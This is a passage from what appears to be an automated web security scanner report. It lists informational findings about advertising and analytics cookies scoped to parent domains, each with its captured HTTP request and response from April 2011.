Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.11. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.12. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0

15.13. http://core1.node15.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core1.node15.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...

15.14. http://core2.node12.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core2.node12.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...

15.15. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

15.16. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

15.17. http://goods.adnectar.com/analytics/get_avia_js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/analytics/get_avia_js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...

15.18. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...

15.19. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

15.20. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

15.21. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
